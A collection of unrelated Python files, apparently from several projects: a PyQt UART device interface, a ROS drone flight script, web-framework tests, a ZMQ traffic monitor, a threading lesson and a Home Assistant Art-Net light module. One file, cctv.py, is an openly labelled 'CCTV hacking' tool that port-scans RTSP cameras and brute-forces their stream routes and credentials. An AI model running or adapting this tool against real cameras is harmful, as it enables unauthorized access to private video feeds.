oai_kpa_interface_backend.py
from PyQt5 import QtGui
from PyQt5.QtWidgets import QWidget, QTableWidgetItem
import threading
import time
import json
import os.path
from . import oai_kpa_interface_gui
from . import utils
from . import oai_kpa_interface
class OAI_KPA_Interface_controller(QWidget, oai_kpa_interface_gui.Ui_Form):
def __init__(self):
# ------------------- window init ------------------------ #
super().__init__()
self.setupUi(self)
self.setMinimumHeight(485)
self.setWindowTitle('OAI KPA Interface')
# ======================================================== #
# ------------------ custom signals -------------------- #
self.update_table_signal_obj = utils.UpdateTableSignal()
self.update_table_signal_obj.update_table_signal.connect(self.update_table)
# ======================================================== #
# ------------------ connect signals -------------------- #
self.uart_connect_button.pressed.connect(self.connect_device)
self.uart_serial_num_refresh_button.pressed.connect(self.refresh_serial_num_list)
self.uart_serial_num_combobox.currentIndexChanged.connect(self.update_serial_num_in_line_edit)
self.send_in_uart_button.pressed.connect(self.uart_transmit)
self.reload_file_button.pressed.connect(self.reload_log_file)
self.clear_browser_button.pressed.connect(self.clear_log_browser)
self.print_in_browser_checkbox.pressed.connect(self.log_browser_change_condition)
self.print_in_file_checkbox.pressed.connect(self.log_file_change_condition)
# ====================================================== #
self.interface = oai_kpa_interface.OaiDigitalModule(serial_num=['20703699424D'], debug=True)
self.single_window = True
self.read_continuously_flag = False
self.config_file_name = "config.json"
self.command_file_name = "commands.json"
self.ai_read_thread = None
# ------------------ uart variables -------------------- #
self.ai_list = []
self.uart_last_parcel = []
self.rx_struct = {}
self.last_write_ptr = 0
if self.uart_ch_combobox.currentText() == 'UART 1':
self.uart = self.interface.uart1
else:
self.uart = self.interface.uart2
# ====================================================== #
if not self.search_command_file():
print("command file does not exist")
command_obj = utils.Commands()
command_obj.cmd = [['start', '0, 1, 2, 3'], ['stop', '2, 3, 4, 5']]
utils.create_json_file(command_obj, self.command_file_name)
else:
with open(self.command_file_name, "r") as read_file:
command_obj = utils.Commands()
command_obj.__dict__ = json.load(read_file)
print(command_obj.cmd)
if len(command_obj.cmd) == 0:
self.scroll_area.close()
else:
for i in command_obj.cmd:
btn = utils.DynamicButton(i[0], self, cmd=i[1])
btn.left_click.connect(self.dynamic_button_pressed)
self.vbox.addWidget(btn)
self.scroll_area.setLayout(self.vbox)
if not self.search_config_file():
print("config file does not exist")
config_obj = utils.Config(channel=0, baudrate=1, parity=0, stop_bit=0, serial_num=5)
utils.create_json_file(config_obj, self.config_file_name)
else:
print("config file exists")
try:
with open(self.config_file_name, "r") as read_file:
config_obj = utils.Config()
config_obj.__dict__ = json.load(read_file)
self.uart_ch_combobox.setCurrentIndex(config_obj.uart_channel)
self.uart_baudrate_combobox.setCurrentIndex(config_obj.uart_baudrate)
self.uart_parity_combobox.setCurrentIndex(config_obj.uart_parity)
self.uart_stop_bit_combobox.setCurrentIndex(config_obj.uart_stop_bit)
self.uart_serial_num_line_edit.setText(config_obj.serial_num)
except Exception as error:
print(error)
if not self.single_window:
self.widget_3.close()
def search_config_file(self):
return os.path.isfile(self.config_file_name) and os.stat(self.config_file_name).st_size != 0
def search_command_file(self):
return os.path.isfile(self.command_file_name) and os.stat(self.command_file_name).st_size != 0
def connect_device(self):
try:
if self.uart_connect_button.text() == "Connect":
config_obj = utils.Config(channel=0, baudrate=1, parity=0, stop_bit=0, serial_num=5)
config_obj.uart_channel = self.uart_ch_combobox.currentIndex()
config_obj.uart_baudrate = self.uart_baudrate_combobox.currentIndex()
config_obj.uart_parity = self.uart_parity_combobox.currentIndex()
config_obj.uart_stop_bit = self.uart_stop_bit_combobox.currentIndex()
config_obj.serial_num = self.uart_serial_num_line_edit.text()
with open(self.config_file_name, 'w') as file:
file.write(config_obj.to_json())
if self.interface.connect() == 1:
self.uart_connect_button.setText("Disconnect")
self.read_continuously_flag = True
self.ai_read_thread = threading.Thread(name='ai_read', target=self.__read_routine, daemon=True)
self.ai_read_thread.start()
if not self.ai_read_thread.is_alive():
self.read_continuously_flag = False
print("some error with thread")
else:
self.uart_connect_button.setText("Error connection")
else:
self.uart_connect_button.setText("Connect")
self.read_continuously_flag = False
self.interface.disconnect()
self.update_table()
except Exception as error:
print("oai_kpa_interface error in func connect_device")
print(error)
def refresh_serial_num_list(self):
self.uart_serial_num_combobox.clear()
devices = self.interface.client.get_connected_devices()
for i in devices:
if i[1] != '':
self.uart_serial_num_combobox.addItem(i[1])
def update_serial_num_in_line_edit(self):
self.uart_serial_num_line_edit.setText(self.uart_serial_num_combobox.currentText())
def uart_transmit(self):
if self.send_in_uart_line_edit.text() != "":
            # split() without arguments tolerates repeated separators and avoids empty tokens
            input_array = self.send_in_uart_line_edit.text().replace(',', ' ').replace(';', ' ').split()
            uart_send_byte_array = [int(byte) for byte in input_array]
print("uart tx: ", uart_send_byte_array)
self.interface.uart_send(data_bytes=uart_send_byte_array, uart=self.uart)
self.log_browser.append("tx[" + str(self.uart.tx_packet_counter) + "] -> " + self.send_in_uart_line_edit.text())
self.uart.tx_packet_counter += 1
def reload_log_file(self):
pass
def clear_log_browser(self):
self.log_browser.clear()
def log_browser_change_condition(self):
pass
def log_file_change_condition(self):
pass
def update_table(self):
try:
# self.ai_list = [0, 1, 2, 3, 4, 5, 6, 7]
# print(self.ai_list)
counter = 0
for i in self.ai_list:
if self.interface.client.connection_status:
                    self.analog_inputs_table.setItem(counter, 0, QTableWidgetItem(str(i)))  # row per channel, matching the item(counter, 0) reads below
if i > 3100:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 0, 0))
elif 1100 < i <= 3100:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 196, 0))
else:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(0, 255, 0))
counter += 1
else:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 255, 255))
counter += 1
except Exception as error:
print(error)
def __read_routine(self):
self.rx_struct = self.interface.uart_get_rx_struct(self.uart)
self.last_write_ptr = self.rx_struct.get('write_ptr')
while self.read_continuously_flag:
try:
self.ai_list = self.interface.get_analog_inputs()
self.rx_struct = self.interface.uart_get_rx_struct(self.uart)
if self.last_write_ptr != self.rx_struct.get('write_ptr'):
print("last write_ptr before = ", self.last_write_ptr)
self.log_browser.append('rx[' + str(self.uart.rx_packet_counter) + '] <- ' +
str(self.rx_struct.get('data')))
self.last_write_ptr = self.rx_struct.get('write_ptr')
print("last write_ptr after = ", self.last_write_ptr)
self.uart.rx_packet_counter += 1
self.update_table_signal_obj.update_table_signal.emit()
time.sleep(0.2)
except Exception as error:
print(error)
def dynamic_button_pressed(self):
print(self.sender().cmd)
self.log_browser.append("tx[" + str(self.uart.tx_packet_counter) + "] -> " + self.sender().cmd)
self.uart.tx_packet_counter += 1
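# Minimal launch sketch (assumption — not part of the original module) for
# hosting this widget in a Qt application:
#
#     import sys
#     from PyQt5.QtWidgets import QApplication
#     app = QApplication(sys.argv)
#     window = OAI_KPA_Interface_controller()
#     window.show()
#     sys.exit(app.exec_())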
drone_sample_controller_pictures.py
#!/usr/bin/env python
import ConfigParser #to parse config file with drone and employer's addresses and keys
import cv2 #for image converting
import ipfshttpclient #to send data to IPFS
import os #to locate files
import rospy #Python client library for ROS
import subprocess #to call shell commands from terminal and use robonomics binary
import threading #threading to publish topics
import time #to sleep
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist #message type for /cmd_vel
from sensor_msgs.msg import Image #message type for /drone/front_camera/image_raw
from std_msgs.msg import Empty #message type for /drone/takeoff and /drone/land
def takeoff():
rospy.loginfo("Taking Off")
takeoff = rospy.Publisher('drone/takeoff', Empty, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
takeoff.publish()
if stop_takingoff:
break
rate.sleep()
def land():
rospy.loginfo("Landing")
land = rospy.Publisher('drone/land', Empty, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
land.publish()
if stop_landing:
break
rate.sleep()
def fly():
rospy.loginfo("Flying")
move = rospy.Publisher('cmd_vel', Twist, queue_size=10)
circle_command = Twist()
circle_command.linear.x = 1.0
circle_command.linear.y = 0.0
circle_command.linear.z = 0.0
circle_command.angular.x = 0.0
circle_command.angular.y = 0.0
circle_command.angular.z = 0.4
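    # Illustrative: constant forward speed with constant yaw rate traces a
    # circle of radius v / w = 1.0 / 0.4 = 2.5 m.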
rate = rospy.Rate(10)
while not rospy.is_shutdown():
move.publish(circle_command)
if stop_flying:
circle_command.linear.x = 0.0
circle_command.angular.z = 0.0
move.publish(circle_command)
break
rate.sleep()
def take_pictures():
    # Subscribe once; re-creating the Subscriber on every loop iteration would
    # stack up duplicate subscriptions.
    image_sub = rospy.Subscriber("/drone/front_camera/image_raw", Image, image_callback)
    rate = rospy.Rate(2)
    while not rospy.is_shutdown():
        if stop_taking_pictures:
            image_sub.unregister()
            break
        rate.sleep()
def image_callback(msg):
global i
global dirname
    # throttle: save at most one frame per second
    if time.time() - i > 1:
        i = time.time()
try:
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imwrite(dirname + 'src/drone_images/front_camera_image' + str(time.time()) + '.jpeg', cv2_img)
rospy.loginfo("Image saved!")
        except CvBridgeError as e:
print(e)
rospy.init_node('drone_controller', anonymous = False)
rospy.loginfo('Node initialized')
global i
global dirname
i = time.time()
bridge = CvBridge()
#waiting for transaction
rospy.loginfo("Parsing Config")
dirname = os.path.dirname(__file__) + '/../'
configParser = ConfigParser.RawConfigParser()
configFilePath = dirname + 'src/config.config'
configParser.read(configFilePath)
rospy.loginfo("Parsing Completed")
rospy.loginfo("Creating directory for pictures")
os.mkdir(dirname + 'src/drone_images')
rospy.loginfo("Waiting for flight payment")
program = configParser.get('key_and_addresses', 'ROBONOMICS_DIR') + "/robonomics io read launch" #that's the bash command to launch Robonomics IO and read the transactions
process = subprocess.Popen(program, shell=True, stdout=subprocess.PIPE)
while True:
try:
output = process.stdout.readline()
if output.strip() == configParser.get('key_and_addresses', 'EMPLOYER_ADDRESS') + " >> " + configParser.get('key_and_addresses', 'DRONE_ADDRESS') + " : true": #checking the correct payment to the drone address
rospy.loginfo("Flight Paid!")
process.kill()
break #after that the script will continue running
if output.strip():
rospy.loginfo("Not my flight is paid!")
except KeyboardInterrupt:
process.kill()
        raise SystemExit
takingoff = threading.Thread(target=takeoff)
flying = threading.Thread(target=fly)
landing = threading.Thread(target=land)
taking_pictures = threading.Thread(target=take_pictures)
stop_takingoff = False
stop_flying = False
stop_landing = False
stop_taking_pictures = False  # flags used to stop the threads
taking_pictures.start()
rospy.loginfo("Started taking pictures")
takingoff.start()
time.sleep(1)
stop_takingoff = True
takingoff.join()
flying.start()
time.sleep(10)
stop_flying = True
flying.join()
landing.start()
time.sleep(1)
stop_landing = True
landing.join()
stop_taking_pictures = True
taking_pictures.join()
rospy.loginfo("Pushing files to IPFS")
try:
    client = ipfshttpclient.connect()
    res = client.add(dirname + 'src/drone_images', recursive=True)
    rospy.loginfo("Files pushed. IPFS hash is " + res[-1].values()[0].encode('utf8'))
except Exception as e:
    print(e)
rospy.loginfo("Removing directory")
try:
piclist = [f for f in os.listdir(dirname + 'src/drone_images')]
for f in piclist:
os.remove(os.path.join(dirname + 'src/drone_images', f))
os.rmdir(dirname + 'src/drone_images')
except Exception as e:
print(e)
rospy.loginfo ("Publishing IPFS hash to chain")
try:
program = "echo \"" + res[-1].values()[0].encode('utf8') + "\" | " + configParser.get('key_and_addresses', 'ROBONOMICS_DIR') + "/robonomics io write datalog -s " + configParser.get('key_and_addresses', 'DRONE_KEY')
process = subprocess.Popen(program, shell=True, stdout=subprocess.PIPE)
output = process.stdout.readline()
rospy.loginfo("Published data to chain. Transaction hash is " + output.strip())
except Exception as e:
print(e)
rospy.loginfo("Job done. Check DAPP for IPFS data hash")
test_http.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import queue
import pretend
import warehouse.http
_REQUEST = pretend.stub(
log=pretend.stub(
debug=pretend.call_recorder(lambda *args: None),
)
)
class TestSession:
def test_create(self):
config = {
"verify": "foo",
}
factory = warehouse.http.ThreadLocalSessionFactory(config)
session_a, session_b = factory(_REQUEST), factory(_REQUEST)
assert session_a is session_b
assert session_a.verify == session_b.verify == config["verify"]
def test_threads(self):
def _test_factory(fifo, start):
start.wait()
factory = warehouse.http.ThreadLocalSessionFactory()
# the actual session instance is stuck into the queue here as to
# maintain a reference so it's not gc'd (which can result in id
# reuse)
fifo.put(
(threading.get_ident(), factory(_REQUEST))
)
start = threading.Event()
fifo = queue.Queue()
threads = [
threading.Thread(target=_test_factory, args=(fifo, start))
for _ in range(10)
]
for thread in threads:
thread.start()
start.set()
for thread in threads:
thread.join()
# data pushed into the queue is (threadid, session).
# this basically proves that the session object id is different per
# thread
results = [fifo.get() for _ in range(len(threads))]
idents, objects = zip(*results)
assert len(set(idents)) == len(threads)
assert len(set(id(obj) for obj in objects)) == len(threads)
def test_includeme():
config = pretend.stub(
registry=pretend.stub(
settings={},
),
add_request_method=pretend.call_recorder(
lambda *args, **kwargs: None
),
)
warehouse.http.includeme(config)
assert len(config.add_request_method.calls) == 1
call = config.add_request_method.calls[0]
assert isinstance(call.args[0], warehouse.http.ThreadLocalSessionFactory)
assert call.kwargs == {"name": "http", "reify": True}
start_and__monitor.py
'''
Copyright 2019-present Open Networking Foundation
SPDX-License-Identifier: Apache-2.0
'''
import zmq
import time
import threading
import sys
import signal
import os
old_stats = {"in_router" : {}, "out_router" : {}}
new_stats = {"in_router" : {}, "out_router" : {}}
def createDir(dir_path):
    try:
        if not os.path.exists(dir_path):
            os.makedirs(dir_path)
    except OSError:
        print('Error creating directory: ' + dir_path)
def monitor_router(name):
global new_stats
path = 'ipc://ipc/monitor/'+name
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect(path)
    socket.setsockopt(zmq.SUBSCRIBE, b'')
while True:
try:
message = socket.recv_json()
new_stats[name] = message[name]
except:
print "Thread will exit now..."
socket.close()
break
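# Inferred from the display loop below: each router publishes a JSON object of
# the form {router_name: {identity: [queue_name, total_message_count]}}.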
createDir('./ipc/monitor')
createDir('./ipc/slaves/push')
t1 = threading.Thread(target=monitor_router,args=("in_router",))
t2 = threading.Thread(target=monitor_router,args=("out_router",))
t1.start()
t2.start()
os.system("clear")
try:
while True:
#print in_string
#print out_string
#print new_stats
#print old_stats
print "**************** Ingress Statistics *******************\n"
print "DP IP | Total Messages | Msgs/Sec"
for dp_ip, [queue_name, curr_ctr] in new_stats['in_router'].iteritems():
if not dp_ip in old_stats['in_router']:
old_stats['in_router'][dp_ip] = 0
print dp_ip," | ",curr_ctr," | ",(curr_ctr-old_stats["in_router"][dp_ip])/5
old_stats["in_router"][dp_ip]= curr_ctr
print "\n\n\n**************** Egress Statistics *******************\n"
print "CTF IP | DP IP | Total Messages | Msgs/Sec"
for ident, [queue_name, curr_ctr] in new_stats["out_router"].iteritems():
if not ident in old_stats["out_router"]:
old_stats["out_router"][ident] = 0
print ident," | ",queue_name," | ",curr_ctr," | ",(curr_ctr-old_stats["out_router"][ident])/5
old_stats["out_router"][ident]= curr_ctr
time.sleep(5)
os.system("clear")
except:
print "Exception: Main thread will exit now"
os.kill(os.getpid(), signal.SIGKILL)
cctv.py
import sys, time, argparse, re, threading
import pyfiglet
from threading import Lock
from colorama import init
from termcolor import colored
from libs import masscanscanner as masscan
from libs import dealer
from libs import attackroutes
from libs import attackcredentials
init() # Colors
s_print_lock = Lock()  # thread-safe printing for cctv
ascii_banner = pyfiglet.figlet_format("cctv")
print("{}\n{}\n\n".format(ascii_banner, "CCTV hacking"))
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True, help="CCTV tek bir IP adresinde hedefleyin.")
args = parser.parse_args()
cidrregex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(3[0-2]|[1-2][0-9]|[0-9]))$"
ipv4regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
if re.match(cidrregex, args.target) is None and re.match(ipv4regex, args.target) is None:
    print(colored("[ERR] Invalid CCTV target specified.", "red"))
    sys.exit(0)
print(colored("[INFO] Scanning RTSP ports...", "cyan"))
scanResults = masscan.detect(args.target)
if scanResults is None:
    print(colored("[!] No targets found.", "red"))
    sys.exit(0)
print(colored("[INFO] Port scan complete. Launching attack...", "cyan"))
# Thread-safe print
def s_print(*a, **b):
with s_print_lock:
print(*a, **b)
def attack(target, port):
    authMethod = dealer.decide(target, port)  # Determine the target's authentication method
    if authMethod is None:  # Target probably requires a known route
        s_print(colored("[INFO] {} at port {} requires a valid route. Trying to find one...".format(target, port), "cyan"))
        routesFirst = attackroutes.start(target, port, authMethod)
        if routesFirst is not None and len(routesFirst) > 0:  # If routes found
            s_print(colored("[INFO] We got valid route(s) for {}:{}! Attacking...".format(target, port), "yellow"))
            # Launch the credentials attack with the routes already found.
            credsAfter = attackcredentials.start(target, port, authMethod, routesFirst)
            if credsAfter is not None and len(credsAfter) > 0:
                for cred in credsAfter:
                    s_print(colored("[SUCCESS] Found: {}".format(cred), "green"))
            else:
                s_print(colored("[FAIL] No credentials found for {}:{}".format(target, port), "red"))
        else:
            s_print(colored("[FAIL] No valid route found at {}:{}".format(target, port), "red"))
    else:  # Digest or Basic authentication
        s_print(colored("[INFO] {} at port {} uses Digest or Basic authentication".format(target, port), "cyan"))
        credsFirst = attackcredentials.start(target, port, authMethod)
        if credsFirst is not None and len(credsFirst) > 0:  # If credentials were found
            s_print(colored("[INFO] We got valid credentials for {}:{}! Now finding routes...".format(target, port), "yellow"))
            for user in credsFirst[target][port]:
                # Launch the route attack using the valid credentials
                routesAfter = attackroutes.start(target, port, authMethod, user, credsFirst[target][port][user])
                if routesAfter is not None and len(routesAfter) > 0:
                    for stream in routesAfter:
                        s_print(colored("[SUCCESS] Found: {}".format(stream), "green"))
                else:
                    s_print(colored("[FAIL] No valid cctv stream found at {}:{}".format(target, port), "red"))
        else:
            s_print(colored("[FAIL] No credentials found for {}:{}".format(target, port), "red"))
for target in scanResults:
    for port in scanResults[target]["tcp"]:
        if scanResults[target]["tcp"][port]["state"] != "open":
            continue  # Skip closed ports (sanity check)
        thread = threading.Thread(target=attack, args=(target, port))
        thread.start()
        if threading.active_count() >= 100:  # crude throttle: wait before spawning more threads
            thread.join()
conftest.py
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
def wraps(i, fn, args):
    # helper for mp.spawn, which passes the process index as the first argument
    return fn(*args)
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
    if pyfuncitem.get_closest_marker("spawn"):
        testfunction = pyfuncitem.obj
        funcargs = pyfuncitem.funcargs
        testargs = tuple(funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames)
        mp.spawn(wraps, (testfunction, testargs))
        return True
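# Illustrative usage (not part of the original file): a test opts in with
#
#     @pytest.mark.spawn
#     def test_runs_in_child_process():
#         assert 1 + 1 == 2
#
# and the hook above executes it via torch.multiprocessing.spawn.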
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
day27-4 线程之间执行是无序的.py
# Conclusion: threads execute in no fixed order; which thread runs next is decided by the CPU scheduler
import threading
import time
def task():
time.sleep(1)
    # Get the current thread
print(threading.current_thread())
if __name__ == '__main__':
    # Create a batch of threads in a loop
for i in range(10):
        # Each loop iteration creates one sub-thread
sub_thread = threading.Thread(target=task)
        # Start the sub-thread's task
sub_thread.start()
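    # Illustrative: across runs, the ten Thread(...) lines print in varying
    # order, because the OS scheduler decides which sleeping thread wakes first.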
artnet.py
"""
Home Assistant support for Art-Net/DMX lights over IP
Date: 2018-08-14
Homepage: https://github.com/jnimmo/hass-artnet
Author: James Nimmo
"""
import asyncio
import logging
import socket
from struct import pack
from threading import Thread
import time
from homeassistant.const import (CONF_DEVICES, CONF_HOST, CONF_NAME, CONF_PORT, CONF_TYPE)
from homeassistant.components.light import (ATTR_BRIGHTNESS, ATTR_ENTITY_ID, ATTR_HS_COLOR,
ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
PLATFORM_SCHEMA, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR, SUPPORT_WHITE_VALUE,
SUPPORT_TRANSITION)
from homeassistant.util.color import color_rgb_to_rgbw
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
import voluptuous as vol
_LOGGER = logging.getLogger(__name__)
DATA_ARTNET = 'light_artnet'
CONF_CHANNEL = 'channel'
CONF_DMX_CHANNELS = 'dmx_channels'
CONF_DEFAULT_COLOR = 'default_rgb'
CONF_DEFAULT_LEVEL = 'default_level'
CONF_SEND_LEVELS_ON_STARTUP = 'send_levels_on_startup'
CONF_TRANSITION = ATTR_TRANSITION
# Light types
CONF_LIGHT_TYPE_DIMMER = 'dimmer'
CONF_LIGHT_TYPE_RGB = 'rgb'
CONF_LIGHT_TYPE_RGBW = 'rgbw'
CONF_LIGHT_TYPE_RGBW_AUTO = 'rgbw_auto'
CONF_LIGHT_TYPE_SWITCH = 'switch'
CONF_LIGHT_TYPES = [CONF_LIGHT_TYPE_DIMMER, CONF_LIGHT_TYPE_RGB, CONF_LIGHT_TYPE_RGBW_AUTO,
CONF_LIGHT_TYPE_SWITCH, CONF_LIGHT_TYPE_RGBW]
# Number of channels used by each light type
CHANNEL_COUNT_MAP, FEATURE_MAP, COLOR_MAP = {}, {}, {}
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_DIMMER] = 1
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGB] = 3
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGBW] = 4
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = 4
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_SWITCH] = 1
# Features supported by light types
FEATURE_MAP[CONF_LIGHT_TYPE_DIMMER] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION)
FEATURE_MAP[CONF_LIGHT_TYPE_RGB] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR)
FEATURE_MAP[CONF_LIGHT_TYPE_RGBW] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR | SUPPORT_WHITE_VALUE)
FEATURE_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR)
FEATURE_MAP[CONF_LIGHT_TYPE_SWITCH] = ()
# Default color for each light type if not specified in configuration
COLOR_MAP[CONF_LIGHT_TYPE_DIMMER] = None
COLOR_MAP[CONF_LIGHT_TYPE_RGB] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_RGBW] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_SWITCH] = None
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_DMX_CHANNELS, default=512): vol.All(vol.Coerce(int), vol.Range(min=1, max=512)),
vol.Required(CONF_DEFAULT_LEVEL, default=0): cv.byte,
vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [
{
vol.Required(CONF_CHANNEL): vol.All(vol.Coerce(int), vol.Range(min=1, max=512)),
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_TYPE): vol.In(CONF_LIGHT_TYPES),
vol.Optional(CONF_DEFAULT_LEVEL): cv.byte,
vol.Optional(ATTR_WHITE_VALUE): cv.byte,
vol.Optional(CONF_DEFAULT_COLOR): vol.All(
vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.Optional(CONF_TRANSITION, default=0): vol.All(vol.Coerce(int), vol.Range(min=0, max=60)),
}
]),
vol.Optional(CONF_PORT, default=6454): cv.port,
vol.Optional(CONF_SEND_LEVELS_ON_STARTUP, default=True): cv.boolean,
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
send_levels_on_startup = config.get(CONF_SEND_LEVELS_ON_STARTUP)
# Send the specified default level to pre-fill the channels with
overall_default_level = config.get(CONF_DEFAULT_LEVEL)
    dmx = DMXGateway(host, port, overall_default_level, config[CONF_DMX_CHANNELS])
lights = (ArtnetLight(light, dmx, send_levels_on_startup) for light in config[CONF_DEVICES])
async_add_devices(lights)
return True
class ArtnetLight(Light):
"""Representation of an Artnet Light."""
def __init__(self, light, controller, send_immediately):
"""Initialize an artnet Light."""
self._controller = controller
# Fixture configuration
self._channel = light.get(CONF_CHANNEL)
self._name = light.get(CONF_NAME)
self._type = light.get(CONF_TYPE, CONF_LIGHT_TYPE_DIMMER)
self._fade_time = light.get(CONF_TRANSITION)
self._brightness = light.get(CONF_DEFAULT_LEVEL, controller.default_level)
self._rgb = light.get(CONF_DEFAULT_COLOR, COLOR_MAP.get(self._type))
self._white_value = light.get(ATTR_WHITE_VALUE, 0)
# Apply maps and calculations
self._channel_count = CHANNEL_COUNT_MAP.get(self._type, 1)
self._channels = [channel for channel in range(self._channel, self._channel + self._channel_count)]
self._features = FEATURE_MAP.get(self._type)
# Brightness needs to be set to the maximum default RGB level, then scale up the RGB values to what HA uses
if self._rgb:
self._brightness = max(self._rgb)
self._rgb = scale_rgb_to_brightness(self._rgb, self._brightness)
logging.debug("Setting default values for '%s' to %s", self._name, repr(self.dmx_values))
# Send default levels to the controller
self._controller.set_channels(self._channels, self.dmx_values, send_immediately)
        self._state = self._brightness > 0 or self._white_value > 0
@property
def name(self):
"""Return the display name of this light."""
return self._name
@property
def brightness(self):
"""Return the brightness of the light."""
return self._brightness
@property
def device_state_attributes(self):
data = {}
data['dmx_channels'] = self._channels
data[CONF_TRANSITION] = self._fade_time
data['dmx_values'] = self.dmx_values
return data
@property
def is_on(self):
"""Return true if light is on."""
return self._state
@property
def hs_color(self):
"""Return the HS color value."""
if self._rgb:
return color_util.color_RGB_to_hs(*self._rgb)
else:
return None
@property
def white_value(self):
"""Return the white value of this light between 0..255."""
if self._type == CONF_LIGHT_TYPE_RGBW:
return self._white_value
else:
return None
@property
def dmx_values(self):
# Select which values to send over DMX
if self._type == CONF_LIGHT_TYPE_RGB:
# Scale the RGB colour value to the selected brightness
return scale_rgb_to_brightness(self._rgb, self._brightness)
elif self._type == CONF_LIGHT_TYPE_RGBW:
rgbw = scale_rgb_to_brightness(self._rgb, self._brightness)
rgbw.append(round(self._white_value * (self._brightness / 255)))
return rgbw
elif self._type == CONF_LIGHT_TYPE_RGBW_AUTO:
# Split the white component out from the scaled RGB values
scaled_rgb = scale_rgb_to_brightness(self._rgb, self._brightness)
return color_rgb_to_rgbw(*scaled_rgb)
else:
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return self._features
@property
def should_poll(self):
return False
@property
def fade_time(self):
return self._fade_time
@fade_time.setter
def fade_time(self, value):
self._fade_time = value
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Instruct the light to turn on.
Move to using one method on the DMX class to set/fade either a single channel or group of channels
"""
self._state = True
transition = kwargs.get(ATTR_TRANSITION, self._fade_time)
# Update state from service call
if ATTR_BRIGHTNESS in kwargs:
self._brightness = kwargs[ATTR_BRIGHTNESS]
if ATTR_HS_COLOR in kwargs:
self._rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
# self._white_value = color_rgb_to_rgbw(*self._rgb)[3]
if ATTR_WHITE_VALUE in kwargs:
self._white_value = kwargs[ATTR_WHITE_VALUE]
logging.debug("Setting light '%s' to values %s with transition time %i", self._name, repr(self.dmx_values),
transition)
asyncio.ensure_future(
self._controller.set_channels_async(self._channels, self.dmx_values, transition=transition))
self.async_schedule_update_ha_state()
